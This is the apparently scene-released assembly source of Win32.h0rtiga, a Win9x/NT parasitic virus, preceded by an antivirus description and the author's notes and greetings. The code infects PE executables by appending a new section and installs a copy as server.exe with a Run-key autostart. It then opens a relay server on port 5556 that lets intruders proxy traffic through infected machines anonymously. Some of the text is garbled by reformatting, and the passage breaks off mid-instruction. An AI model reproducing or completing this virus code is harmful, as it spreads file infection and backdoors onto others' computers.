Win32.hortiga
;
Win32.h0rtiga code by | zan [@ Deepzone.org]
;
; 000 DeepZone - Digital Security Center
;
http://www.deepzone.org
;
; ------------------------------------------------- ---------------------------
;
Win32.hortiga
;
;
Avp's Description
;
; - http://www.avp.ch/avpve/newexe/win32/hortiga.stm)
;
IT IS A NonMemory Resident ParasiTic Win32 Virus. It Searches
For Pe EXE Files (Windows Executables), THEN WRITES ITSELF TO
The end of the file. to reference a place for ITS Code the Virus
Creates a new section with the ". | zan" name at the end of the
File.
;
The Virus HAS "Anonymous IP" Ability. That Means That a HACKER
MAY USE Infected Machines As A "Proxy Server" Sending Packets
WITH INFECTED MACHINE'S IP Address:
;
IP1 IP2 IP3
; Hacker's Machine ----- ; A Hacker Connects To The Infected Machine By Using His IP ; address (ip1) And forces the infected machine to forward packets To The Target Machine, Then Infected Machine's IP Address (IP2) IS Used. Using this Mechanism The Hacker Hides His IP Address. ; The Virus Installs ITS "Anonymous" Component As Stand-Alone Program Using the filename server.exe. That program is created in the Windows System Directory and Registered in The Auto-Start Registry Key: ; HKLMSoftwareMicrosoftWindowsCurrentVersionRun ; h0rtiga server = "windirrserver.exe" ; WHERE "WINDIR" is The Windows System Folder. ; The Virus Contains the text string: ; ; (c) 2000. Win9x.h0rtiga v1.0 server activated - http://mareasvivas.cjb.net Coded by | zan - izan@galaxycorp.com / izan@deepzone.org WHO Are you ??? ; "This string is buy as id-text to connection connection to the Hacker's machine WITH THE Server on the infected machine. ; ; - End Avp Description ; ; Win32.h0rtiga by | zan ; H0rtiga Is A Simple Non Resident Parasite. IT Wasn't Developed LIKE A Traditional Viruse But It Finished Infecting Win32 Machines. ; Originally It Was Proof of Concept Code Showing Win9x's Risks and Holes in a spanish whitepaper called "Win32.h0rtiga: Anonimato E Intrusi? N ". ; When Extra Code Was Added to Patch PE Files Inoculating H0RTIGA CODE ; in Arbitrary Files It Became A Virus ... ; ; h0rtiga infects adding an extra section / Object called ". | zan". IT Can INFECT Under Win9X / NT / 2K But ITS PayLoad Only Play in Win9x. ; This runtime infector doesn't mail "modern" Features Like Stealth, ENCRYPTATION or POLYMORPHISM But IF "Classic" Features Like TimeStamp OR File Attributes. ; Infecting with an extra section is "hard" and it had been more Easy Adding ViRal Code to Last Section But I Wanted a Clear, Fast And easy uninfection so I decided the lastest, primitive & hard way Implement. ; H0rtiga PayLoad Plays A Single Server Listening on 5556 Port. THIS Server Lets Full Arbitrary Relay and Can Be Handle with a Generic ; H0rtiga's Client. Yes, That's ... Now you can images Black Hats Exploiting Infected Win9x Machines: Anonymous Surfing, FAKING E-mails, ; BYPASSING IRC Bans ... ; Code Contains Clear Labels and a Lot of Equs and Structures Documenting ViRal Code ... ; ; Greetings ... ; ------------- ; Spanish Sec / Hack Groups, ADM, Beavuh, B0F, Non-Commercial Groups ... ; ; ... and, of course VLAD & 29A; I'd Like to Give Special Thanks BumbleBee / 29A (Fantastic vxer). ; ; I hope That H0rtiga Can Beh Good Contribution to this fantastic 29A ; Release;) ; ; DEEP GREETS ; ----------- ; ; ^ Anuska ^ ; if You Hit Two Times We'll Hack Their Networks ... Sorry mouse support isn't available;) ; ; Thewizard Can Handle Windows;) ; Nemo ; ; Special Greetings ... ; --------------------- ; Win32.h0rtiga is Dedicated to Sandra ... ; ; ; ------------------------------------------------- --------------------------- Win32.h0rtiga - Begin Virus Code (W32H0RTIGA.ASM) ; ------------------------------------------------- --------------------------- ; ------------------------------------------------- ----------- Compiler Options ; ------------------------------------------------- ----------- .386P Locals Jumps .Model flat, stdcall ; ------------------------------------------------- ----------- Just to show a message on virus 1st generation ; ------------------------------------------------- ----------- EXTRN Messageboxa: Proc EXTRN GETMODULEHANDLEA: PROC EXTRN EXITPROCESS: PROC ; ------------------------------------------------- --------------------------- Data Section ; ------------------------------------------------- --------------------------- .DATA DB 0 ; ------------------------------------------------- --------------------------- Code Section ; ------------------------------------------------- --------------------------- .code Start: ; ------------------------------------------------- -----------; h0rtiga main ; ------------------------------------------------- ----------- MOV EAX, [ESP] gkerloop: xor EDX, EDX Dec EAX MOV DX, [EAX 3CH] Test DX, 0F800H Jnz gkerloop CMP EAX, [EAX EDX 34h] Jnz gkerloop Call gdelta GDELTA: POP EBP Sub EBP, Offset GDELTA Lea EDI, EBP KERNEL Stosd LEA ESI, EBP SZ_MGETPROCADDR Call getapiexpk32 Lea EDI, EBP DDGETPROCADDRESS Stosd LEA ESI, EBP SZ_MLOADLIBRARYA Call getapiexpk32 Lea EDI, EBP DDLOADLIBRARYA Stosd Lea ESI, EBP SZ_MKERNEL32 Lea EDI, EBP ADDR_APIS Mov EBX, NUMAPISK32 Call MakeTabla Lea ESI, EBP OSVERSIONFO.DWOSVERSIONFOSIZE Push sizeof_osversioninfo POP ECX XOR Al, Al Delit: Stosb Loop Delit Lea EDI, EBP OSVERSIONFO.DWOSVERSIONFOSIZE Mov Eax, Sizeof_OSVersionInfo; 148 Stosd SUB EDI, 4 Push EDI Call DWORD PTR [EBP DDGETVERSIONEXA] Test Eax, EAX JZ Salir CMP EBP OSVERSIONFO.DWPLATFORMID, VER_PLATFORM_WIN32_WINDOWS Jnz Salir Call insertaservidor Call buscahosttoinfect CMP EAX, INVALID_HANDLE_VALUE JZ Salir XCHG EAX, EBX Infectamas: Call Infecit Call ContinuabusQueda Test Eax, EAX Jnz Infectamas Call TerminabusQueda SALIR: Lea ESI, EBP OldentryPoinTrva Lodsd XCHG EBX, EAX PUSH 0 Call DWORD PTR [EBP DDGETMODULEHANDLEA] Add Eax, EBX JMP EAX ; ------------------------------------------------- ----------- Begin H0RTIGA DATA ; ------------------------------------------------- ----------- Filetime Struc FT_DWLOWDATETIME DD? FT_DWHIGHDATETIME DD? Filetime Ends MAX_PATH EQU 260 Win32_find_data struct WFD_DWFILEATTRIBUTES DD? WFD_FTCREATIONTIME FileTime? WFD_FTLASTACCESSTIME FileTime? WFD_FTLASTWRITETIME FileTime? WFD_NFILESIGH DD? WFD_NFILESZELOW DD? WFD_DWRESERVED0 DD? WFD_DWRESERVED1 DD? WFD_SZFILENAME DB MAX_PATH DUP (?) Wfd_szalternateFileName DB 13 DUP (?) DB 3 DUP (?) WIN32_FIND_DATA ENDS SizeOf_win32_find_data EQU Size Win32_Find_Data INVALID_HANDLE_VALUE EQU -1 VER_PLATFORM_WIN32_WINDOWS EQU 1 _SVersionInfo Struct DWOSVERSIONFOSIZE DD? DWMAJORVERSION DD? DWMINORVERSION DD? DWBUILDNUMBER DD? DWPLATFORMID DD? SZCSDVERSION DB 128 DUP (?) _SVersionInfo Ends Sizeof_OSversionInfo Equ Size_SVersionInfo SZ_MGETPROCADDR DB 'GETPROCADDRESS', 0 DDGETPROCADDRESS DD? SZ_MLOADLIBRARYA DB 'LOADLIBRARYA', 0 DDLOADLIBRARYA DD? KERNEL DD? Counter dw? AddResSTableva DD? OrdinalTableva DD? Numapisk32 EQU 21 SZ_MKERNEL32 DB 'KERNEL32', 0 Tablak32 db 'EXITPROCESS', 0 DB 'getversionexa', 0 DB 'FindfirstFilea', 0 DB 'FINDNEXTFILEA', 0 DB 'FindClose', 0 DB 'CreateFilea', 0 DB 'CreateFilemappinga', 0 DB 'MapViewOffile', 0 DB 'UnmapViewOffile', 0 DB 'CloseHandle', 0 DB 'setFileAttributesa', 0 DB 'setFiletime', 0 DB 'getModuleHandlea', 0 DB 'getcommandlinea', 0 DB 'getSystemDirectorya', 0 DB 'Readfile', 0 DB 'Writefile', 0 DB 'setFilePointer', 0 DB 'getcurrentprocessid', 0 DB 'registerServiceProcess', 0 DB 'GlobalAlloc', 0 AddR_apis: DDEXITPROCESS DD? DDGETVERSIONEXA DD? DDFINDFIRSTFILEA DD? DDFINDNEXTFILEA DD? DDFINDCLOSE DD? DDCREATEFILEA DD? DDCREATEFILEMAPPINGA DD? DDMAPVIEWOFFILE DD? DDUNMAPVIEWOFFILE DD? DDCLOSEHANDLE DD? DDSETFILEATTRIBUTESA DD? DDSETFILETIME DD? DDGETMODULEHANDLEA DD? DDGETCOMMANDLINEA DD? DDGETSYSTEMDIRECTORYA DD? DDREADFILE DD? DDWRITEFILE DD? DDSETFILEPOINTER DD? DDGETCURRENTPROCESSID DD? DDREGISTERSERVICEPROCESS DD? DDGLOBALLOC DD? OsversionInfo _OSVERSIONINFO? _masKexe DB '* .exe', 0 Maxinfeccion EQU 6 Winfinddata Win32_find_data? HficActual DD? HCMAPAAl DD? NewObject: Oname DB ". | Zan", 0, 0, 0 Virtualsize DD 0 RVA DD 0 PhysicalSize DD 0 PhysicalOffset DD 0 Reserved DD 0, 0, 0 Objectflags DD 0e0000060H Sizeof_newobject EQU 28h ObjectTableOffset DD? NumObjects DW? ObjectAlign DD? FileAlign DD? ImageSize DD? SizeTomap DD? OldEntryPoinTrva DD? HREAD DD? HWRITE DD? BYTES_RW DD? SZ_EXEC DB 260 DUP (?) SZ_NSERVER DB 'Server.exe', 0 Addr1 DW 2 DW 0B415H DD? Addr2 DW 2 DW 0000h DB 192, 168, 0, 1 SOCK1 DD? SOCK2 DD? Gotit DD? Buffsz EQU 4096 Adrbuff DD? FD_SET1 DD 1,0 FD_SET2 DD 1,0 FD_set struc NO DD 0 Sockh DD 0 FD_SET ENDS TTL DD 0,64h Semaforo DB 0 Countbouncer DB 0 MsgentryServer DB '(c) 2000. Win9x.h0rtiga v1.0 server activated - http://mareasvivals.cjb.net', 13, 10 DB 'Coded by | zan - izan@galaxycorp.com / izan@deepzone.org', 13, 10, 13, 10 DB 'Who Are you ???', 13, 10 MSGENTRYSERVERLEN EQU $ -MsgentryServer Numapisw32 EQU 10 SZ_MW32 DB 'WSOCK32', 0 Tablaw32 db 'wsastartup', 0 DB 'Socket', 0 DB 'bind', 0 DB 'Listen', 0 DB 'accept', 0 DB 'Connect', 0 DB 'Send', 0 DB 'RECV', 0 DB 'SELECT', 0 DB 'CloseSocket', 0 AddR_apis2: DDWSASSTARTUP DD? DDSOCKET DD? DDBIND DD? DDLISTEN DD? DDACCEPT DD? DDCONNECT DD? DDSEND DD? DDRECV DD? DDSELECT DD? DDCLOSESSOCKET DD? Numapisadv32 EQU 3 SZ_MADV32 DB 'Advapi32', 0 Tablaadv32 DB 'RegcreateKeyexa, 0 DB 'RegSetValueexa, 0 DB 'regclosekey', 0 AddR_apis3: DDREGCREATEKEYEXA DD? DDREGSETVALUEEXA DD? DDREGCLOSEKEY DD? DISPOSITION DD? KEYHANDLE DD? CLASE DB 'Run', 0 Claselen EQU $ -Clase Subkey DB 'SoftwareMicrosoftWindowsCurrentVersionRun', 0 KeyValuelen DD? Keyname DB 'H0RTIGA Server', 0 ; ------------------------------------------------- ----------- ; End H0rtiga Data ; ------------------------------------------------- ----------- Getapiexpk32: Mov Edx, ESI @ _1: CMP BYTE PTR [ESI], 0 JZ @ _2 Inc ESI JMP @ _1 @ _2: inc ESI SUB ESI, EDX MOV ECX, ESI XOR EAX, EAX MOV Word PTR [EBP Counter], AX MOV ESI, [EBP KERNEL] Add ESI, 3CH Lodsw Add Eax, [EBP KERNEL] MOV ESI, [EAX 78H] Add ESI, [EBP KERNEL] Add ESI, 1CH Lodsd Add Eax, [EBP KERNEL] MOV DWORD PTR [EBP AddResSTableva], EAX Lodsd Add Eax, [EBP KERNEL] Push EAX Lodsd Add Eax, [EBP KERNEL] MOV DWORD PTR [EBP OrdinalTableva], EAX POP ESI @ _3: Push ESI Lodsd Add Eax, [EBP KERNEL] Mov ESI, EAX MOV EDI, EDX Push ECX CLD REP CMPSB POP ECX JZ @ _4 POP ESI Add ESI, 4 Inc Word PTR [EBP Counter] JMP @ _3 @ _4: POP ESI Movzx Eax, Word PTR [EBP Counter] SHL EAX, 1 Add Eax, DWORD PTR [EBP OrdinalTableva] XOR ESI, ESI XCHG Eax, ESI Lodsw SHL EAX, 2 Add Eax, DWORD PTR [EBP AddRessTableva] Mov ESI, EAX Lodsd Add Eax, [EBP KERNEL] RET Maketabla: Push ESI Call DWORD PTR [EBP DDLOADLIBRARYA] Push EBX POP ECX Push EAX POP EBX Buki: LODSB Test Al, Al JNZ Buki MT1: PUSH ECX PUSH ESI Push EBX Call DWORD PTR [EBP DDGETPROCADDRESS] Push EAX MT2: LODSB Test Al, Al JNZ MT2 POP EAX Stosd POP ECX LOOP MT1 RET BuscahostToinfect: Lea EDI, EBP Counter XOR AX, AX Stosw LEA ESI, EBP WINFINDDATA PUSH ESI LEA ESI, EBP _MASKEXE PUSH ESI Call DWORD PTR [EBP DDFINDFIRSTFILEA] RET Infecit: Push EBX Lea ESI, EBP WINFINDDATA.WFD_SZFILENAME Call Esinfectable CMP EAX, -1 JZ II_ERROR Call EliminaTributosFichero Test Eax, EAX JZ II_ERROR Lea ESI, EBP WINFINDDATA.WFD_SZFILENAME Push DWORD PTR [EBP SIZETOMAP] POP EBX Call Open & Maped_file_rw CMP EAX, -1 JZ II_ERROR Push EAX POP EBX Add Eax, [EBX 3CH] Push EAX POP EDX Lea EDI, EBP imagesize Mov Eax, DWORD PTR [EDX 50H] Stosd Lea EDI, EBP NUMOBJECTS MOV AX, Word PTR [EDX 6H] Stosw Lea EDI, EBP ObjectAlign MOV EAX, DWORD PTR [EDX 38H] Stosd MOV EAX, DWORD PTR [EDX 3CH] Stosd XOR EAX, EAX Add Ax, Word PTR [EDX 14H] Add Eax, 18h Add Eax, [EBX 3CH] Add Eax, EBX MOV DWORD PTR [EBP ObjectTableOffset], EAX Push EAX POP ESI XOR EAX, EAX MOV AX, Word PTR [EBP NUMOBJECTS]] Push sizeof_newobject POP ECX XOR EDX, EDX Mul ECX Add ESI, ESI Inc Word PTR [EBP NUMOBJECTS]] PUSH ESI POP EDI Mov Eax, [EDI - SIZEOF_NEWOBJECT 8] Add Eax, [EDI - SIZEOF_NEWOBJECT 12] MOV ECX, DWORD PTR [EBP ObjectAlign] XOR EDX, EDX Div ECX INC EAX Mul ECX MOV DWORD PTR [EBP RVA], EAX MOV ECX, DWORD PTR [EBP FileAlign] Push Virlenght POP EAX XOR EDX, EDX Div ECX INC EAX Mul ECX MOV DWORD PTR [EBP Physicalsize], EAX MOV ECX, DWORD PTR [EBP ObjectAlign] Push Virlenght POP EAX XOR EDX, EDX Div ECX INC EAX Mul ECX Mov DWORD PTR [EBP VIRTUALSIZE], EAX MOV EAX, [EDI - SIZEOF_NEWOBJECT 20] Add Eax, [EDI - SIZEOF_NEWOBJECT 16] MOV ECX, DWORD PTR [EBP FILALIN] XOR EDX, EDX Div ECX INC EAX Mul ECX MOV DWORD PTR [EBP PhysicalOffset], EAX Push Virlenght POP EAX Add Eax, DWORD PTR [EBP ImageSize] MOV ECX, DWORD PTR [EBP ObjectAlign] XOR EDX, EDX Div ECX INC EAX Mul ECX MOV DWORD PTR [EBP ImageSize], EAX LEA ESI, EBP NewObject MOV ECX, 10 REP MOVSD Lea ESI, EBP NUMOBJECTS MOV EDX, [EBX 3CH] Add Edx, EBX Lea EDI, [EDX 6h] Movsw Lea ESI, EBP ImageSize Lea EDI, [EDX 50H] Movsd MOV EAX, DWORD PTR [EBP OldentryPoinTrva] Push EAX Push EBX POP EDX Add Edx, [EBX 3CH] Mov Eax, DWORD PTR [EDX 28H] Lea EDI, EBP OldentryPointRVA Stosd MOV EAX, DWORD PTR [EBP RVA] Mov DWORD PTR [EDX 28H], EAX Lea ESI, EBP START MOV EAX, DWORD PTR [EBP PhysicalOffset] Add Eax, EBX XCHG Eax, EDI Mov ECX, Virlenght REP MOVSB POP EAX MOV DWORD PTR [EBP OldentryPointRva], EAX MOV Word PTR [EDX 4CH], 0D00DH Add EBP Counter, 1 XCHG EAX, EBX Call Close & Unmaped_file_rw Call RestauratributosFichero Test Eax, EAX JZ II_ERROR II_ERROR: POP EBX RET ContinuabusQueda: CMP [EBP Counter], MaxInfeccion JZ CB_END LEA ESI, EBP WINFINDDATA PUSH ESI Push EBX Call DWORD PTR [EBP DDFINDNEXTFILEA] RET CB_END: XOR EAX, EaxRet TerminabusQueda: Push EBX Call DWORD PTR [EBP DDFINDCLOSE] RET Open & maped_file_rw: PUSH 0 PUSH 0 Push 3h PUSH 0 PUSH 0 Push 80000000h OR 40000000H PUSH ESI Call DWORD PTR [EBP DDCREATEFILEA] CMP EAX, -1 JZ OMF_ERROR Lea EDI, EBP HFICACTUAL Stosd PUSH 0 Push EBX PUSH 0 Push 4h PUSH 0 Push EAX Call DWORD PTR [EBP DDCREATEFILEMAPPINGA] Test Eax, EAX JZ OMF_ERROR Lea EDI, EBP HCMAPACTUAL Stosd Push EBX PUSH 0 PUSH 0 Push 2H Push EAX Call DWORD PTR [EBP DDMAPVIEWOFFILE] Test Eax, EAX JZ OMF_ERROR RET OMF_ERROR: PUSH -1 POP EAX RET Close & Unmaped_file_rw: Push EAX Call DWORD PTR [EBP DDUNMAPVIEWOFFILE] Test Eax, EAX JZ CUF_ERROR Lea ESI, EBP WINFINDDATA.WFD_FTLASTWRITETIME PUSH ESI Lea ESI, EBP WINFINDDATA.WFD_FTLASTACCESSTIME PUSH ESI Lea ESI, EBP WINFINDDATA.WFD_FTCREATIONTIME PUSH ESI LEA ESI, EBP HFICACTUAL Lodsd Push EAX Call DWORD PTR [EBP DDSETFILETIME] Lea ESI, EBP HCMAPACTUAL Lodsd Push EAX Call DWORD PTR [EBP DDCLOSEHANDLE] LEA ESI, EBP HFICACTUAL Lodsd Push EAX Call DWORD PTR [EBP DDCLOSEHANDLE] Test Eax, EAX JZ CUF_ERROR XOR EAX, EAX RET CUF_ERROR: PUSH -1 POP EAX RET EliminaTributosFichero: Push 80h Lea ESI, EBP WINFINDDATA.WFD_SZFILENAME PUSH ESI Call DWORD PTR [EBP DDSETFILEATTRIBUTESA] RET RestauratributosFichero: Lea ESI, EBP WINFINDDATA.WFD_DWFILEATTRIBUTES Lodsd Push EAX Lea ESI, EBP WINFINDDATA.WFD_SZFILENAME PUSH ESI Call DWORD PTR [EBP DDSETFILEATTRIBUTESA] RET Esinfectable: PUSH 0 PUSH 0 Push 3h PUSH 0 PUSH 0 Push 80000000H PUSH ESI Call DWORD PTR [EBP DDCREATEFILEA] CMP EAX, -1 JZ OMFR_ERROR Lea EDI, EBP HFICACTUAL Stosd PUSH 0 PUSH 0 PUSH 0 Push 2H PUSH 0 Push EAX Call DWORD PTR [EBP DDCREATEFILEMAPPINGA] Test Eax, EAX JZ OMFR_ERROR Lea EDI, EBP HCMAPACTUAL Stosd PUSH 0 PUSH 0 PUSH 0 Push 4h Push EAX Call DWORD PTR [EBP DDMAPVIEWOFFILE] Test Eax, EAX JZ OMFR_ERROR Push EAX Push EAX POP EDX Add Eax, [EDX 3CH] CMP Word Ptr [EDX], 'ZM' JNZ NOINFECT CMP Word PTR [EAX], 'EP' JNZ NOINFECT CMP Word PTR [EAX 4CH], 0D00DH JNZ SiINFECT NOINFECT: PUSH -1 POP EBX JMP SNINFECT SiINFECT: CALL CALCULASITOMAP SNINFECT: CALL DWORD PTR [EBP DDUNMAPVIEWOFFILE] Test Eax, EAX JZ OMFR_ERROR Lea ESI, EBP HCMAPACTUAL Lodsd Push EAX Call DWORD PTR [EBP DDCLOSEHANDLE] Test Eax, EAX JZ OMFR_ERROR LEA ESI, EBP HFICACTUAL Lodsd Push EAX Call DWORD PTR [EBP DDCLOSEHANDLE] Test Eax, EAX JZ OMFR_ERROR XCHG EBX, EAX RET OMFR_ERROR: PUSH -1 POP EAX RET Calculasizeetomap: Push EAX POP EBX XCHG EBX, EDX XOR EAX, EAX MOV AX, Word PTR [EDX 6H] MOV Word PTR [EBP NUMOBJECTS], AX XOR EAX, EAX Add Ax, Word PTR [EDX 14H] Add Eax, 18h Add Eax, EDX MOV DWORD PTR [EBP ObjectTableOffset], EAX Push EAX POP ESI XOR EAX, EAX MOV AX, Word PTR [EBP NUMOBJECTS]] Push sizeof_newobject POP ECX XOR EDX, EDX Mul ECX Add ESI, ESI XOR EDX, EDX Add Edx, [EBX 3CH] Add Edx, EBX Lea EDI, EBP FileAlign MOV EAX, DWORD PTR [EDX 3CH] Stosd MOV ECX, DWORD PTR [EBP FILALIN] Push Virlenght POP EAX XOR EDX, EDX Div ECX INC EAX Mul ECX MOV DWORD PTR [EBP Physicalsize], EAX MOV EAX, [ESI - SIZEOF_NEWOBJECT 20] Add Eax, [ESI - SIZEOF_NEWOBJECT 16] MOV ECX, DWORD PTR [EBP FILALIN] XOR EDX, EDX Div ECX INC EAX Mul ECX MOV DWORD PTR [EBP PhysicalOffset], EAX XCHG EBX, EAX Lea ESI, EBP PhysicalSize Lodsd Add Ebx, EAX MOV DWORD PTR [EBP SizetOMap], EBX RET INSERTAREGISTRO: LEA ESI, EBP SZ_MADV32 Lea EDI, EBP AddR_APIS3 Mov EBX, NUMAPISADV32 Call MakeTabla Lea ESI, EBP DISPSITION PUSH ESI Add ESI, 4 PUSH ESI PUSH 0 Push 0F003FH PUSH 0 Add ESI, 4 PUSH ESI PUSH 0 Add ESI, CLASELEN PUSH ESI Push 80000002H Call DWORD PTR [EBP DDREGCREATEKEYEXA] Test Eax, EAX Jnz reg_error Lea ESI, EBP KeyHandle Lodsd XCHG EAX, EBX Push DWORD PTR [EBP KeyValuelen] LEA ESI, EBP SZ_EXEC PUSH ESI Push 1h PUSH 0 LEA ESI, EBP Keyname PUSH ESI Push EBX Call DWORD PTR [EBP DDREGSETVALUEEXA] Test Eax, EAX Jnz reg_error Push EBX Call DWORD PTR [EBP DDREGCLOSEKEY] REG_ERROR: RET INSERTASERVIDOR: Call DWORD PTR [EBP DDGETCOMMANDLINEA] Push EAX POP ESI Lea EDI, EBP SZ_EXEC OT_Bmas: LODSB Stosb Test Al, Al JNZ OT_BMAS PUSH 0 Push 00000080H Push 3 PUSH 0 Push 00000001H Push 80000000H LEA ESI, EBP SZ_EXEC PUSH ESI Call DWORD PTR [EBP DDCREATEFILEA] CMP EAX, -1 JZ ErrorX MOV DWORD PTR [EBP HREAD], EAX Push 260 LEA EBX, EBP SZ_EXEC Push EBX Call Dword PTR [EBP DDGETSYSTEMDIRECTORYA] Test Eax, EAX JZ ErrorX Add Eax, EBX XCHG Eax, EDI LEA ESI, EBP SZ_NSERVER OT_BMAS2: LODSB Stosb Test Al, Al JNZ OT_Bmas2 MOV DWORD PTR [EBP KeyValuelen], 0 LEA ESI, EBP SZ_EXEC Calclenstr: Lodsb INC DWORD PTR [EBP KeyValuelen] Test Al, Al JNZ Calclenstr Call insertaregistro PUSH 0 Push 00000080H Push 1 PUSH 0 Push 0h Push 40000000H LEA ESI, EBP SZ_EXEC PUSH ESI Call DWORD PTR [EBP DDCREATEFILEA] CMP EAX, -1 JZ ErrorX MOV DWORD PTR [EBP HWRITE], EAX Read_again: xor Eax, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push 260 LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDREADFILE] Test Eax, EAX JZ ErrorX LEA ESI, EBP BYTES_RW Lodsd Test Eax, EAX JZ FDF XCHG EAX, EBX XOR EAX, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push EBX LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HWRITE Lodsd Push EAX Call DWORD PTR [EBP DDWRITEFILE] Test Eax, EAX Jnz Read_Again JZ ErrorX FDF: PUSH 0 PUSH 0 Push 3ch LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDSETFILEPOINTER] XOR EAX, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push 4 LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDREADFILE] PUSH 0 PUSH 0 LEA ESI, EBP SZ_EXEC Lodsd Add Eax, 40 Push EAX Push EAX POP EBX LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDSETFILEPOINTER] XOR EAX, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push 4 LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDREADFILE] LEA ESI, EBP SZ_EXEC Lodsd Add Eax, Offsserver PUSH 0 PUSH 0 Push EBX Push EAX POP EBX LEA ESI, EBP HWRITE Lodsd Push EAX Call DWORD PTR [EBP DDSETFILEPOINTER] Push EBX POP EAX Lea EDI, EBP SZ_EXEC Stosd XOR EAX, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push 4 LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HWRITE Lodsd Push EAX Call DWORD PTR [EBP DDWRITEFILE] PUSH 0 PUSH 0 Push 3ch LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDSETFILEPOINTER] XOR EAX, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push 4 LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDREADFILE] PUSH 0 PUSH 0 LEA ESI, EBP SZ_EXEC Lodsd Add Eax, 92 Push EAX Push EAX POP EBX LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDSETFILEPOINTER] PUSH 0 PUSH 0 Push EBX Push EAX POP EBX LEA ESI, EBP HWRITE Lodsd Push EAX Call DWORD PTR [EBP DDSETFILEPOINTER] Push 2 POP EAX Lea EDI, EBP SZ_EXEC Stosd XOR EAX, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push 2 LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HWRITE Lodsd Push EAX Call DWORD PTR [EBP DDWRITEFILE] LEA ESI, EBP HREAD PUSH ESI Call DWORD PTR [EBP DDCLOSEHANDLE] Test Eax, EAX JZ ErrorX LEA ESI, EBP HWRITE PUSH ESI Call DWORD PTR [EBP DDCLOSEHANDLE] ErroRex: Ret Error: Push 0 Call DWORD PTR [EBP DDEXITPROCESS] OFFSSERVER EQU $ -Start Server: MOV EAX, [ESP] gkerloop2: xor EDX, EDX Dec EAX MOV DX, [EAX 3CH] Test DX, 0F800H Jnz gkerloop2 CMP EAX, [EAX EDX 34H] Jnz gkerloop2 Call gdelta2 GDELTA2: POP EBP Sub EBP, Offset GDELTA2 Lea EDI, EBP KERNEL Stosd LEA ESI, EBP SZ_MGETPROCADDR Call getapiexpk32 Lea EDI, EBP DDGETPROCADDRESS Stosd LEA ESI, EBP SZ_MLOADLIBRARYA Call getapiexpk32 Lea EDI, EBP DDLOADLIBRARYA Stosd Lea ESI, EBP SZ_MKERNEL32 Lea EDI, EBP ADDR_APIS Mov EBX, NUMAPISK32 Call MakeTabla Lea ESI, EBP SZ_MW32 Lea EDI, EBP ADDR_APIS2 Mov EBX, NUMAPISW32 Call MakeTabla Call DWORD PTR [EBP DDGETCURRENTPROCESSID] Push 1 Push EAX Call DWORD PTR [EBP DDREGISTERSERVICEPROCESS] Push buffsz PUSH 0 Call DWORD PTR [EBP DDGLOBALLOC] CMP EAX, -1 Je Error MOV DWORD PTR [EBP ADRBUFF], EAX Push EAX Push 101h Call DWORD PTR [EBP DDWSASTARTUP] Push 6 Push 1 Push 2 Call DWORD PTR [EBP DDSOCKET] CMP EAX, -1 Je Error MOV DWORD PTR [EBP SOCK1], EAX Push 16 Lea ESI, EBP AddR1 PUSH ESI LEA ESI, EBP SOCK1 Lodsd Push EAX Call DWORD PTR [EBP DDBIND] CMP EAX, -1 Je Error Push 1 LEA ESI, EBP SOCK1 Lodsd Push EAX Call DWORD PTR [EBP DDLISTEN] MOV BYTE PTR [EBP SEMAFORO], 0 CONFIGIT: Mov Al, Byte PTR [EBP SEMAFORO] Test Al, Al JNZ QUEES? PUSH 0 PUSH 0 LEA ESI, EBP SOCK1 Lodsd Push EAX Call DWORD PTR [EBP DDACCEPT] MOV DWORD PTR [EBP Gotit], EAX PUSH 0 Push MsgentryServerlen LEA ESI, EBP MSGENTRYSERVER PUSH ESI Lea ESI, EBP Gotit Lodsd Push EAX Call DWORD PTR [EBP DDSEND] PUSH 0 Push buffsz Lea ESI, EBP ADRBUFF Lodsd Push EAX Lea ESI, EBP Gotit Lodsd Push EAX Call DWORD PTR [EBP DDRECV] XCHG EBX, EAX Lea ESI, EBP Gotit Lodsd Push EAX Call DWORD PTR [EBP DDCLOSESOCKET] CMP EBX, 8 JNZ Configit Lea ESI, EBP ADRBUFF Lodsd XCHG ESI, EAX Lodsw MOV BYTE PTR [EBP SEMAFORO], Al Lea EDI, EBP AddR2Add EDI, 2 Movsw Movsd JMP Configit QUEES ?: Dec Al Test Al, Al JZ Bis0 MOV BYTE PTR [EBP SEMAFORO], 0 JMP Configit Bis0: MOV BYTE PTR [EBP CountBouncer], 20 Bis: Push 0 PUSH 0 LEA ESI, EBP SOCK1 Lodsd Push EAX Call DWORD PTR [EBP DDACCEPT] MOV DWORD PTR [EBP Gotit], EAX MOV DWORD PTR [EBP FD_SET1.SOCKH], EAX Push 6 Push 1 Push 2 Call DWORD PTR [EBP DDSOCKET] CMP EAX, -1 Je Error MOV DWORD PTR [EBP SOCK2], EAX MOV DWORD PTR [EBP FD_SET2.SOCKH], EAX Push 16 Lea ESI, EBP AddR2 PUSH ESI Lea ESI, EBP SOCK2 Lodsd Push EAX Call DWORD PTR [EBP DDCONNECT] CMP EAX, -1 JE NOSOK2 Main_lp: LEA ESI, EBP TTL PUSH ESI PUSH 0 PUSH 0 LEA ESI, EBP FD_SET1 PUSH ESI Push 10h Call DWORD PTR [EBP DDSELECT] CMP EAX, -1 Je Outnow CMP EAX, 1 JE R1W2 MOV DWORD PTR [EBP FD_SET1.NO], 1 LEA ESI, EBP 